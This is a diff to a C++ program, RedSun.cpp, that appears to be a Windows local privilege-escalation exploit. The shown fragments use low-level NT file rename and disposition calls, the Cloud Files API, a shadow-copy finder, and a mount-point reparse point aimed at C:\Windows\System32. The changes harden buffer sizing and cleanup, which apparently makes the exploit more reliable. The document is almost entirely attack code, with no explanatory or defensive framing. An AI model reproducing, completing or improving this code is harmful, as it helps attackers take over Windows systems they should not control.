mostwise · mostwise · Apr 30, 2026 · Apr 30, 2026 · Apr 30, 2026 · Apr 30, 2026
diff --git a/RedSun.cpp b/RedSun.cpp
@@ -8,17 +8,21 @@
 #define _CRT_SECURE_NO_WARNINGS
 #define WIN32_NO_STATUS
 #include <iostream>
+#include <climits>
 #include <Windows.h>
 #undef WIN32_NO_STATUS
 #include <conio.h>
 #include <winternl.h>
 #include <ntstatus.h>
 #include <cfapi.h>
 
-#pragma comment(lib,"synchronization.lib")
-#pragma comment(lib,"sas.lib")
-#pragma comment(lib,"ntdll.lib")
-#pragma comment(lib,"CldApi.lib")
+#pragma comment(lib,"synchronization.lib")
+#pragma comment(lib,"sas.lib")
+#pragma comment(lib,"ntdll.lib")
+#pragma comment(lib,"CldApi.lib")
+#pragma comment(lib,"advapi32.lib")
+#pragma comment(lib,"ole32.lib")
+#pragma comment(lib,"user32.lib")
 
 
 typedef struct _FILE_DISPOSITION_INFORMATION_EX {
@@ -429,12 +433,15 @@ DWORD WINAPI ShadowCopyFinderThread(wchar_t* foo)
 }
 
 
-void rev(char* s) {
-
-    // Initialize l and r pointers
-    int l = 0;
-    int r = strlen(s) - 1;
-    char t;
+void rev(char* s) {
+
+    // Initialize l and r pointers
+    size_t l = 0;
+    size_t len = strlen(s);
+    if (len == 0)
+        return;
+    size_t r = len - 1;
+    char t;
 
     // Swap characters till l and r meet
     while (l < r) {
@@ -689,18 +696,37 @@ int main()
     CloseHandle(hmap);
 
 
-    {
-        wchar_t _tmp[MAX_PATH] = { 0 };
+    {
+        wchar_t _tmp[MAX_PATH] = { 0 };
         wsprintfW(_tmp, L"\\??\\%s.TEMP2", workdir);
-
-        PFILE_RENAME_INFORMATION pfri = (PFILE_RENAME_INFORMATION)malloc(sizeof(FILE_RENAME_INFORMATION) + (sizeof(wchar_t) * wcslen(_tmp)));
-        ZeroMemory(pfri, sizeof(FILE_RENAME_INFORMATION) + (sizeof(wchar_t) * wcslen(_tmp)));
-        pfri->ReplaceIfExists = TRUE;
-        pfri->FileNameLength = (sizeof(wchar_t) * wcslen(_tmp));
-        memmove(&pfri->FileName[0], _tmp, (sizeof(wchar_t) * wcslen(_tmp)));
-        stat = _NtSetInformationFile(hfile, &iostat, pfri, sizeof(FILE_RENAME_INFORMATION) + (sizeof(wchar_t) * wcslen(_tmp)), (FILE_INFORMATION_CLASS)10);
-        _NtSetInformationFile(hfile, &iostat, &fdiex, sizeof(fdiex), (FILE_INFORMATION_CLASS)64);
-    }
+
+        const size_t tmp_len = wcslen(_tmp);
+        if (tmp_len > (ULONG_MAX / sizeof(wchar_t)))
+        {
+            printf("Rename filename length exceeds maximum size.\n");
+            return 1;
+        }
+        const size_t tmp_bytes = tmp_len * sizeof(wchar_t);
+        if (tmp_bytes > (ULONG_MAX - sizeof(FILE_RENAME_INFORMATION)))
+        {
+            printf("Rename buffer size exceeds maximum limit.\n");
+            return 1;
+        }
+        const size_t rename_info_size = sizeof(FILE_RENAME_INFORMATION) + tmp_bytes;
+        PFILE_RENAME_INFORMATION pfri = (PFILE_RENAME_INFORMATION)malloc(rename_info_size);
+        if (!pfri)
+        {
+            printf("Failed to allocate rename buffer.\n");
+            return 1;
+        }
+        ZeroMemory(pfri, rename_info_size);
+        pfri->ReplaceIfExists = TRUE;
+        pfri->FileNameLength = static_cast<ULONG>(tmp_bytes);
+        memmove(&pfri->FileName[0], _tmp, tmp_bytes);
+        stat = _NtSetInformationFile(hfile, &iostat, pfri, static_cast<ULONG>(rename_info_size), (FILE_INFORMATION_CLASS)10);
+        _NtSetInformationFile(hfile, &iostat, &fdiex, sizeof(fdiex), (FILE_INFORMATION_CLASS)64);
+        free(pfri);
+    }
     wchar_t _rp[MAX_PATH] = { L"\\??\\" };
     wcscat(_rp, workdir);
     UNICODE_STRING _usrp = { 0 };
@@ -714,12 +740,18 @@ int main()
         return 1;
     }
 
-
-    wchar_t rptarget[] = { L"\\??\\C:\\Windows\\System32" };
-    DWORD targetsz = wcslen(rptarget) * 2;
-    DWORD printnamesz = 1 * 2;
-    DWORD pathbuffersz = targetsz + printnamesz + 12;
-    DWORD totalsz = pathbuffersz + REPARSE_DATA_BUFFER_HEADER_LENGTH;
+
+    wchar_t rptarget[] = { L"\\??\\C:\\Windows\\System32" };
+    const size_t rptarget_len = wcslen(rptarget);
+    if (rptarget_len > (ULONG_MAX / sizeof(wchar_t)))
+    {
+        printf("Reparse target length exceeds maximum size.\n");
+        return 1;
+    }
+    DWORD targetsz = static_cast<DWORD>(rptarget_len * sizeof(wchar_t));
+    DWORD printnamesz = static_cast<DWORD>(sizeof(wchar_t));
+    DWORD pathbuffersz = targetsz + printnamesz + 12;
+    DWORD totalsz = pathbuffersz + REPARSE_DATA_BUFFER_HEADER_LENGTH;
     REPARSE_DATA_BUFFER* rdb = (REPARSE_DATA_BUFFER*)HeapAlloc(GetProcessHeap(), HEAP_GENERATE_EXCEPTIONS | HEAP_ZERO_MEMORY, totalsz);
     rdb->ReparseTag = IO_REPARSE_TAG_MOUNT_POINT;
     rdb->ReparseDataLength = static_cast<USHORT>(pathbuffersz);
@@ -735,12 +767,11 @@ int main()
 
     HANDLE hlk = NULL;
 
-    HANDLE htimer = CreateWaitableTimer(NULL, FALSE, NULL);
-    LARGE_INTEGER duetime = { 0 };
-    GetSystemTimeAsFileTime((LPFILETIME)&duetime);
-    ULARGE_INTEGER _duetime = { duetime.LowPart, duetime.HighPart };
-    _duetime.QuadPart += 0x2FAF080;
-    duetime.QuadPart = _duetime.QuadPart;
+    FILETIME duetime = { 0 };
+    GetSystemTimeAsFileTime(&duetime);
+    ULARGE_INTEGER _duetime = { duetime.dwLowDateTime, duetime.dwHighDateTime };
+    const ULONGLONG due_time_offset_100ns = 0x2FAF080; // 5 seconds in 100-nanosecond units.
+    _duetime.QuadPart += due_time_offset_100ns;
     CloseHandle(hfile);
     for (int i = 0; i < 1000; i++)
     {